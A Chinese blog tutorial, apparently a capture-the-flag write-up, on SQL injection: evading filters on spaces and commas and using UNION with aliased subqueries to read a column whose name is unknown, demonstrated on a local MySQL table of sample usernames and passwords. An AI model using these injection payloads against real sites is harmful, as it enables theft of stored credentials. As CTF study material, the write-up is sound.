脚本之家 服务器常用软件
快捷导航
您的位置:首页数据库Mysql → Mysql绕过未知字段名

Mysql如何巧妙的绕过未知字段名详解

 更新时间:2017年05月31日 08:39:56   投稿:daisy  
这篇文章主要给大家介绍了Mysql如何巧妙的绕过未知字段名的相关资料,文中给出了详细的示例代码供大家参考学习,对学习mysql具有一定的参考学习价值,需要的朋友们下面来一起看看吧。

前言

本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:

实现思路

题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;

存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:

思想就是获取flag,让其在已知字段名下出现;

示例代码:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对脚本之家的支持。

您可能感兴趣的文章:

相关文章

  • 全面解析MySQL常见问题的排查与解决方法

    全面解析MySQL常见问题的排查与解决方法

    MySQL 是一款常用的关系型数据库管理系统,广泛应用于各类应用开发和数据管理场景,然而,在实际使用中,MySQL 有时会遇到启动失败、服务中断或性能问题等情况,所以本文给大家介绍了MySQL常见问题的排查与解决方法,需要的朋友可以参考下
    2024-11-11
  • 解决ERROR 1129 (HY000): Host ‘xxx‘ is blocked because of many问题

    解决ERROR 1129 (HY000): Host ‘xxx‘ is blocked because 

    这篇文章主要介绍了解决ERROR 1129 (HY000): Host ‘xxx‘ is blocked because of many问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教
    2024-04-04
  • 使用MYSQL TIMESTAMP字段进行时间加减运算问题

    使用MYSQL TIMESTAMP字段进行时间加减运算问题

    这篇文章主要介绍了使用MYSQL TIMESTAMP字段进行时间加减运算问题,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
    2023-02-02
  • centos上安装mysql并设置远程访问的操作方法

    centos上安装mysql并设置远程访问的操作方法

    这篇文章主要介绍了centos上安装mysql并设置远程访问的操作方法,需要的朋友可以参考下
    2017-11-11
  • Mysql常见的驱动程序使用

    Mysql常见的驱动程序使用

    MySQL驱动程序是连接应用程序与MySQL数据库的重要组件,本文主要介绍了Mysql常见的驱动程序使用,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
    2025-03-03
  • 基于MySQL的存储引擎与日志说明(全面讲解)

    基于MySQL的存储引擎与日志说明(全面讲解)

    下面小编就为大家分享一篇基于MySQL的存储引擎与日志说明(全面讲解),具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2017-12-12
  • mysql查看索引的方式

    mysql查看索引的方式

    这篇文章主要介绍了mysql查看索引的方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教
    2023-09-09
  • mysql字符串拼接并设置null值的实例方法

    mysql字符串拼接并设置null值的实例方法

    在本文中小编给大家整理的是关于mysql 字符串拼接+设置null值的实例内容以及具体方法,需要的朋友们可以学习下。
    2019-09-09
  • MySQL中常见关键字的用法总结

    MySQL中常见关键字的用法总结

    这篇文章主要为大家详细介绍了MySQL中常见关键字的用法,例如GROUP BY、ORDER BY和LIMIT,文中的示例代码讲解详细,感兴趣的小伙伴可以了解一下
    2023-09-09
  • MySQL实现replace函数的几种实用场景

    MySQL实现replace函数的几种实用场景

    这篇文章主要介绍了MySQL实现replace函数的几种实用场景,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2021-02-02

最新评论